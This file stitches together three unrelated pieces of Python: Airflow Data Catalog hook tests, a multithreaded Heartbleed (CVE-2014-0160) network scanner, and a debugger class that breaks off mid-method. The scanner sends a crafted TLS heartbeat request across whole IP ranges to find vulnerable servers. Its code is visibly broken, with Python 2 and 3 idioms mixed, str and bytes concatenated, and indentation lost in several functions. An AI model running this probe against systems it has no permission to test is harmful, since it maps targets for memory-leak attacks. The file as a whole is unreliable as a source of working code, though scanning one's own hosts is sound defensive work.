    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_tag without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_tag(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                tag=deepcopy(TEST_TAG),
                template_id=TEST_TAG_TEMPLATE_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_protobuff(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_tag with a protobuf Tag and no project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_tag(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                tag=Tag(),
                template_id=TEST_TAG_TEMPLATE_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_tag_template without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_tag_template(
                location=TEST_LOCATION,
                tag_template_id=TEST_TAG_TEMPLATE_ID,
                tag_template=TEST_TAG_TEMPLATE,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_create_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """create_tag_template_field without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.create_tag_template_field(
                location=TEST_LOCATION,
                tag_template=TEST_TAG_TEMPLATE_ID,
                tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
                tag_template_field=TEST_TAG_TEMPLATE_FIELD,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """delete_entry without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.delete_entry(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """delete_entry_group without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.delete_entry_group(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """delete_tag without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.delete_tag(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                tag=TEST_TAG_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """delete_tag_template without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.delete_tag_template(
                location=TEST_LOCATION,
                tag_template=TEST_TAG_TEMPLATE_ID,
                force=TEST_FORCE,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_delete_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """delete_tag_template_field without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.delete_tag_template_field(
                location=TEST_LOCATION,
                tag_template=TEST_TAG_TEMPLATE_ID,
                field=TEST_TAG_TEMPLATE_FIELD_ID,
                force=TEST_FORCE,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """get_entry without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.get_entry(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_entry_group(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """get_entry_group without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.get_entry_group(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                read_mask=TEST_READ_MASK,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """get_tag_template without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.get_tag_template(
                location=TEST_LOCATION,
                tag_template=TEST_TAG_TEMPLATE_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_list_tags(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """list_tags without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.list_tags(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                page_size=TEST_PAGE_SIZE,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_get_tag_for_template_name(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """get_tag_for_template_name without a project id must raise before listing tags."""
        tag_1 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format("invalid-project"))
        tag_2 = mock.MagicMock(template=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2))
        mock_get_conn.return_value.list_tags.return_value = [tag_1, tag_2]
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.get_tag_for_template_name(
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                template_name=TEST_TAG_TEMPLATE_PATH.format(TEST_PROJECT_ID_2),
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_rename_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """rename_tag_template_field without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.rename_tag_template_field(
                location=TEST_LOCATION,
                tag_template=TEST_TAG_TEMPLATE_ID,
                field=TEST_TAG_TEMPLATE_FIELD_ID,
                new_tag_template_field_id=TEST_NEW_TAG_TEMPLATE_FIELD_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_entry(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """update_entry without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.update_entry(
                entry=TEST_ENTRY,
                update_mask=TEST_UPDATE_MASK,
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry_id=TEST_ENTRY_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """update_tag without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.update_tag(
                tag=deepcopy(TEST_TAG),
                update_mask=TEST_UPDATE_MASK,
                location=TEST_LOCATION,
                entry_group=TEST_ENTRY_GROUP_ID,
                entry=TEST_ENTRY_ID,
                tag_id=TEST_TAG_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag_template(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """update_tag_template without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.update_tag_template(
                tag_template=TEST_TAG_TEMPLATE,
                update_mask=TEST_UPDATE_MASK,
                location=TEST_LOCATION,
                tag_template_id=TEST_TAG_TEMPLATE_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
    @mock.patch(
        "airflow.providers.google.common.hooks.base_google.GoogleBaseHook._get_credentials_and_project_id",
        return_value=(TEST_CREDENTIALS, None),
    )
    @mock.patch("airflow.providers.google.cloud.hooks.datacatalog.CloudDataCatalogHook.get_conn")
    def test_update_tag_template_field(self, mock_get_conn, mock_get_creds_and_project_id) -> None:
        """update_tag_template_field without a project id must raise AirflowException."""
        with pytest.raises(AirflowException, match=TEST_MESSAGE):
            self.hook.update_tag_template_field(
                tag_template_field=TEST_TAG_TEMPLATE_FIELD,
                update_mask=TEST_UPDATE_MASK,
                tag_template=TEST_TAG_TEMPLATE_ID,
                location=TEST_LOCATION,
                tag_template_field_id=TEST_TAG_TEMPLATE_FIELD_ID,
                retry=TEST_RETRY,
                timeout=TEST_TIMEOUT,
                metadata=TEST_METADATA,
            )
| |
#!/usr/bin/env python
# Single-host usage example: python ssltest.py example.com
# To see all options for multiple hosts and multi-threading: python ssltest.py --help
import sys
import struct
import socket
import time
import select
import re
import threading
import netaddr
import json
import os
import datetime
import signal
from optparse import OptionParser
from collections import defaultdict
from multiprocessing.dummy import Pool
# Per-host scan results; also serialized to/from the optional --json file.
host_status = {}
# Hosts that should not be rescanned (populated from --resume / --only-* filters).
hosts_to_skip = []
# Tally of scan outcomes; updated under `lock` by worker threads.
counter = defaultdict(int)
# Guards host_status/counter and log-file writes across worker threads.
lock = threading.Lock()
options = OptionParser(usage='%prog <network> [network2] [network3] ...', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains')
options.add_option('--port', '-p', dest="port", default=443, help="Port to scan on all hosts or networks, default 443")
options.add_option('--input', '-i', dest="input_file", default=[], action="append", help="Optional input file of networks or ip addresses, one address per line")
options.add_option('--logfile', '-o', dest="log_file", default="results.txt", help="Optional logfile destination")
options.add_option('--resume', dest="resume", action="store_true", default=False, help="Do not rescan hosts that are already in the logfile")
options.add_option('--timeout', '-t', dest="timeout", default=5, help="How long to wait for remote host to respond before timing out")
options.add_option('--threads', dest="threads", default=100, help="If specific, run X concurrent threads")
options.add_option('--json', dest="json_file", default=None, help="Save data as json into this file")
options.add_option('--only-vulnerable', dest="only_vulnerable", action="store_true", default=False, help="Only scan hosts that have been scanned before and were vulnerable")
options.add_option('--only-unscanned', dest="only_unscanned", action="store_true", default=False, help="Only scan hosts that appear in the json file but have not been scanned")
options.add_option('--summary', dest="summary", action="store_true", default=False, help="Useful with --json. Don't scan, just print old results")
options.add_option('--verbose', dest="verbose", action="store_true", default=False, help="Print verbose information to screen")
options.add_option('--max', dest="max", default=None, help="Exit program after scanning X hosts. Useful with --only-unscanned")
opts, args = options.parse_args()
# multiprocessing.dummy.Pool is a *thread* pool — suitable for this I/O-bound scan.
threadpool = Pool(processes=int(opts.threads))
def h2bin(x):
    """Convert a whitespace-separated hex dump string into raw bytes.

    Uses binascii.unhexlify, which behaves identically on Python 2 and 3;
    the previous str.decode('hex') codec exists only on Python 2.
    """
    import binascii
    return binascii.unhexlify(x.replace(' ', '').replace('\n', ''))
# Canned TLS ClientHello record (hex dump) replayed verbatim to start the
# handshake. It advertises a broad cipher list and, crucially, the heartbeat
# extension (the trailing "00 0f 00 01 01"), which the heartbleed probe needs.
hello = h2bin('''
16 03 03 00 dc 01 00 00 d8 03 03 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
def recvall(s, length, timeout=5):
    """Read exactly `length` bytes from socket `s` within `timeout` seconds.

    Returns the bytes read, or None on deadline expiry, receive error, or EOF
    before `length` bytes arrived.
    """
    endtime = time.time() + timeout
    rdata = b''  # b'' == '' on Python 2; also correct for bytes on Python 3
    remain = length
    while remain > 0:
        rtime = endtime - time.time()
        if rtime < 0:
            return None
        # Bug fix: wait for the *remaining* time, not a hard-coded 5 seconds,
        # so the caller-supplied timeout is actually honoured.
        r, w, e = select.select([s], [], [], rtime)
        if s in r:
            try:
                data = s.recv(remain)
            except Exception:
                return None
            # EOF before the full payload arrived
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
def recvmsg(s):
    """Receive one TLS record; return (type, version, payload) or (None, None, None)."""
    header = recvall(s, 5)
    if header is None:
        return None, None, None
    record_type, version, length = struct.unpack('>BHH', header)
    payload = recvall(s, length, 10)
    if payload is None:
        return None, None, None
    return record_type, version, payload
def hit_hb(s):
    """Read records after the heartbeat probe: True on a heartbeat response (24),
    False on an alert (21) or a read failure."""
    while True:
        record_type, _, _ = recvmsg(s)
        if record_type is None or record_type == 21:
            return False
        if record_type == 24:
            return True
def unpack_handshake(pay):
    """
    Unpack the SSL handshake in Multiple Handshake Message.

    Returns a list of (msg_type, length, body) tuples. Stops cleanly on a
    truncated trailing header instead of raising struct.error.
    """
    paylen = len(pay)
    offset = 0
    payarr = []
    while offset < paylen:
        # Robustness: a truncated header (fewer than 4 bytes left) would
        # previously crash struct.unpack; treat it as end of input.
        if paylen - offset < 4:
            break
        h = pay[offset:offset + 4]
        t, l24 = struct.unpack('>B3s', h)
        # Widen the 24-bit big-endian length to 32 bits. b'\x00' (== '\x00'
        # on Python 2) keeps this working for bytes payloads on Python 3.
        l = struct.unpack('>I', b'\x00' + l24)[0]
        payarr.append((
            t,
            l,
            pay[offset+4:offset+4+l]
        ))
        offset = offset+l+4
    return payarr
def is_vulnerable(host, timeout, port=443):
    """ Check if remote host is vulnerable to heartbleed
    Returns:
        None  -- If remote host has no ssl
        False -- Remote host has ssl but likely not vulnerable
        True  -- Remote host might be vulnerable
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(int(timeout))
    try:
        sock.connect((host, int(port)))
    except Exception:
        return None
    sock.send(hello)
    # Consume handshake records until the ServerHelloDone (type 14) arrives.
    while True:
        record_type, record_version, payload = recvmsg(sock)
        if record_type is None:
            return None
        if record_type == 22:
            messages = unpack_handshake(payload)
            if any(t == 14 for t, l, p in messages):
                break
    # construct heartbeat request packet
    ver_chr = chr(record_version & 0xff)
    hb = h2bin("18 03") + ver_chr + h2bin("40 00 01 3f fd") + "\x01"*16381
    hb += h2bin("18 03") + ver_chr + h2bin("00 03 01 00 00")
    sock.send(hb)
    return hit_hb(sock)
def store_results(host_name, current_status):
    """Record one scan result for `host_name` and append it to the log file.

    Updates the shared `counter` and `host_status` structures under `lock`,
    tracks first/last scan times plus a changelog of status transitions,
    and returns the log line that was written.
    """
    current_time = time.time()
    with lock:
        counter[current_status] += 1
        counter["Total"] += 1
        if host_name not in host_status:
            host_status[host_name] = {}
        host = host_status[host_name]
        # Make a note when this host was last scanned
        host['last_scan'] = current_time
        # Make a note if this host has never been scanned before
        if 'first_scan' not in host:
            host['first_scan'] = current_time
        elif host.get('status', 'never been scanned') != current_status:
            # If it has a different check result from before
            host['changelog'] = host.get('changelog', [])
            changelog_entry = [current_time, current_status]
            host['changelog'].append(changelog_entry)
        host['status'] = current_status
        with open(opts.log_file, 'a') as f:
            # Bug fix: log the host *name*.  The original formatted {host}
            # via **locals(), and at this point `host` is the per-host
            # status dict, so the log line contained a dict repr.
            message = "{0} {1} {2}".format(current_time, host_name,
                                           current_status)
            f.write(message + "\n")
    return message
def scan_host(host):
""" Scans a single host, logs into
Returns:
list(timestamp, ipaddress, vulnerabilitystatus)
"""
if opts.max and int(opts.max) >= counter["Total"]:
return
host = str(host)
if host in hosts_to_skip:
return
result = is_vulnerable(host, opts.timeout, opts.port)
message = store_results(host, result)
if opts.verbose:
print message
return message
def scan_hostlist(hostlist, threads=5):
""" Iterates through hostlist and scans them
Arguments:
hostlist -- Iterable with ip addresses
threads -- If specified, run in multithreading mode
"""
task = threadpool.map_async(scan_host, hostlist)
while True:
print counter['Total'], "hosts done"
task.wait(1)
if task.ready() or hasattr(threadpool, 'done'):
return
threadpool.close()
threadpool.join()
def clean_hostlist(args):
    """ Returns list of iterables
    Examples:
        >>> hostlist = ["127.0.0.1", "127.0.0.2"]
        >>> clean_hostlist(hostlist)
    """
    hosts = []
    networks = []
    for entry in args:
        # If it contains any alphanumerics, it might be a domain name
        if any(ch.isalpha() for ch in entry):
            # Special hack, because alexa top x list is kind of weird
            hosts.append(entry.split('/')[0])
        # If arg contains a / we assume its a network name
        elif '/' in entry:
            networks.append(netaddr.IPNetwork(entry))
        else:
            hosts.append(entry)
    result = []
    for network in networks:
        # Networks big enough to keep a thread pool busy stay as lazy
        # iterables; small ones are expanded into the flat host list.
        if network.size >= opts.threads:
            result.append(network)
        else:
            hosts.extend(str(addr) for addr in network)
    if hosts:
        result.append(hosts)
    return result
def import_json(filename):
    """ Reads heartbleed data in json format from this file """
    with open(filename) as f:
        data = json.load(f)
    for host, info in data.items():
        host_status[host] = info
def export_json(filename):
    """ Save scan results into filename as json data
    """
    with open(filename, 'w') as f:
        f.write(json.dumps(host_status, indent=4))
def print_summary():
    """ Print summary of previously stored json data to screen """
    if not opts.json_file:
        pass
        #options.error("You need to provide --json with --summary")
    else:
        import_json(opts.json_file)
    # Local counter shadows the shared scan counter on purpose: the summary
    # is recomputed from host_status, not from live scan counts.
    counter = defaultdict(int)
    for host, data in host_status.items():
        friendly_status = "unknown"
        status = data.get('status', "Not scanned")
        # Map the tri-state result of is_vulnerable() (None/True/False)
        # onto human-readable labels.
        if status is None:
            friendly_status = "SSL Connection Failed"
        elif status is True:
            friendly_status = "Vulnerable"
        elif status is False:
            friendly_status = "Not Vulnerable"
        else:
            friendly_status = str(status)
        last_scan = int(float(data.get('last_scan',0)))
        last_scan = datetime.datetime.fromtimestamp(last_scan).strftime('%Y-%m-%d %H:%M:%S')
        counter[friendly_status] += 1
        counter['Total'] += 1
        # The --only-* filters suppress printing only; the counts above
        # still include every host.
        if opts.only_vulnerable and not status:
            continue
        elif opts.only_unscanned and 'status' in data:
            continue
        print "%s %-20s %5s" % (last_scan, host, friendly_status)
    print "------------ summary -----------"
    for k,v in counter.items():
        print "%-7s %s" % (v, k)
    return
def signal_handler(signal, frame):
    # Ctrl+C handler: kill the worker pool and flag shutdown.
    # (The `signal` parameter shadows the signal module here, but the
    # module is not used inside this function.)
    print "Ctrl+C pressed.. aborting..."
    threadpool.terminate()
    # scan_hostlist() polls hasattr(threadpool, 'done') to stop its loop.
    threadpool.done = True
def main():
if opts.summary:
print_summary()
return
if not args and not opts.input_file and not opts.json_file:
options.print_help()
return
# If any input files were provided, parse through them and add all addresses to "args"
for input_file in opts.input_file:
with open(input_file) as f:
for line in f:
words = line.split()
if not words:
continue
# If input file is in masscan's portscan format
if line.startswith("Discovered open port"):
args.append(words.pop())
elif len(words) == 1:
args.append(words[0])
else:
print "Skipping invalid input line: " % line
continue
if opts.json_file:
try:
import_json(opts.json_file)
except IOError:
print opts.json_file, "not found. Not importing any data"
for host_name, data in host_status.items():
if opts.only_unscanned and 'status' in data:
continue
if data.get('status', None) is True or not opts.only_vulnerable:
args.append(host_name)
# For every network in args, convert it to a netaddr network, so we can iterate through each host
remote_networks = clean_hostlist(args)
for network in remote_networks:
scan_hostlist(network, threads=opts.threads)
if opts.json_file:
export_json(opts.json_file)
print_summary()
if __name__ == '__main__':
    # Install the Ctrl+C handler before starting so a long-running scan
    # can be aborted cleanly, then run the scanner.
    signal.signal(signal.SIGINT, signal_handler)
    main()
| |
import bdb
import re
import traceback
import sys
import os
import inspect
from contextlib import contextmanager
def line(frm):
    """Return the line number currently executing in the given frame."""
    return frm.f_lineno
def filename(frm):
    """Return the canonical (symlink-resolved) path of the frame's source file."""
    path = frm.f_code.co_filename
    return os.path.realpath(path)
def function_name(frm):
    """Return the name of the code object running in the frame, or "<unknown>"."""
    name = frm.f_code.co_name
    if name:
        return name
    return "<unknown>"
def match_range(s):
    """Parse a breakpoint hit-count range specification.

    "N"                 -> (N, N+1, 1), i.e. exactly the Nth hit.
    slice-like "A:B:C"  -> (A or 0, B or None, C or 1).
    anything else       -> False.
    """
    single = re.match(r"(\d+)$", s)
    if single:
        n = int(single.group(1))
        return n, n + 1, 1
    sliced = re.match(r"(\d*)(?::(\d*)(?::(\d+))?)?$", s)
    if not sliced:
        return False
    start, end, step = [int(part) if part else None for part in sliced.groups()]
    return start or 0, end, step or 1
def n_in_range(n, ran):
    """True when hit-count `n` falls inside the (start, end, step) range."""
    start, end, step = ran
    if n < start:
        return False
    if end and n >= end:
        return False
    return (n - start) % step == 0
class MyDB(bdb.Bdb):
    """Interactive debugger built on bdb.Bdb.

    The UI is driven through `self.parent` (attached by the embedding
    code), which is expected to expose E_get_cmd, E_set_break,
    E_clear_break, E_show_help, E_show_exception and E_finished.
    NOTE(review): `parent` is assigned outside this class -- confirm.

    Breakpoints are mirrored in the class-level `breakpoints` dict
    ({filename: {line: bpinfo}}) so they survive re-runs of the script.
    """
    breakpoints = {}

    def user_call(self, frame, args):
        """This method is called when there is the remote possibility
        that we ever need to stop in this function."""
        if self._wait_for_mainpyfile:
            return
        print("--call--", function_name(frame), args)
        self.stack, self.curidx = self.get_stack(frame, None)
        if self.stop_here(frame):
            self.wait_cmd(frame)

    def user_line(self, frame):
        """Called for each new source line; prompts for a command."""
        if self._wait_for_mainpyfile:
            # Skip the bootstrap events bdb fires before execution
            # actually reaches the user's script.
            if (self.mainpyfile != filename(frame) or frame.f_lineno <= 0):
                return
            self._wait_for_mainpyfile = False
        print("--line--")
        print("break at", filename(frame), line(frame), "in", function_name(frame))
        self.stack, self.curidx = self.get_stack(frame, None)
        self.wait_cmd(frame)  # continue to next breakpoint

    def user_return(self, frame, value):
        """Called when a function is about to return `value`."""
        if self._wait_for_mainpyfile:
            return
        print("--return--")
        print("return from", function_name(frame), value)
        self.stack, self.curidx = self.get_stack(frame, None)
        self.wait_cmd(frame)  # continue

    def user_exception(self, frame, exception):
        """Called when an exception occurs, with exception = exc_info()."""
        if self._wait_for_mainpyfile:
            return
        print("--exception--")
        print("exception in", function_name(frame), exception)
        self.stack, self.curidx = self.get_stack(frame, exception[2])
        self.wait_cmd(frame)  # continue

    def wait_cmd(self, frame):
        """Ask the UI for the next command at `frame` and act on it.

        Locals/globals are passed to the UI as reprs.  While the UI is
        queried, the user's original __main__ namespace is restored (see
        exit__main__).  NOTE(review): assumes runscript() has already
        saved self.main_copy.
        """
        self.curframe = frame
        ls = {k: repr(v) for k, v in self.filter_vars(frame.f_locals).items()}
        gs = {k: repr(v) for k, v in self.filter_vars(frame.f_globals).items()}
        import __main__
        # Snapshot the debugged script's namespace so tryeval() can later
        # evaluate expressions against it.
        self.main_debug = __main__.__dict__.copy()
        with self.exit__main__(self.main_copy):
            cmd = self.parent.E_get_cmd(line(frame), ls, gs, filename(frame))
        # Empty input repeats the previous command (if any).
        cmd = cmd or (self.last_cmd if hasattr(self, 'last_cmd') else '')
        self.last_cmd = cmd
        cmdl = (cmd.split() or [''])
        s, args = cmdl[0], cmdl[1:]
        if s in ['c']:
            self.set_continue()
        elif s in ['n']:
            self.set_next(frame)
        elif s in ['b']:
            f, l = self.mainpyfile, int(args[0])
            if len(args) > 1:
                mr = match_range(args[1])
                if args[1] == "c":
                    # Explicit clear.
                    self.parent.E_clear_break(f, l)
                    self.clear_break(f, l)
                elif mr:
                    # Hit-count range breakpoint: replace any previous one.
                    self.parent.E_clear_break(f, l)
                    self.clear_break(f, l)
                    self.parent.E_set_break(f, l, {"range": mr, "hits": 0})
                    self.set_break(f, l, {"range": mr, "hits": 0})
                else:
                    # Conditional breakpoint.
                    self.parent.E_clear_break(f, l)
                    self.clear_break(f, l)
                    self.parent.E_set_break(f, l, {"cond": args[1]})
                    self.set_break(f, l, {"cond": args[1]})
            else:
                # Plain unconditional breakpoint.
                self.parent.E_clear_break(f, l)
                self.clear_break(f, l)
                self.parent.E_set_break(f, l, {})
                self.set_break(f, l, {})
            self.wait_cmd(frame)
        elif s in ['s']:
            self.set_step()
        elif s in ['q']:
            self.set_quit()
        elif s in ['r']:
            self.set_return(frame)
        elif s in ['u']:
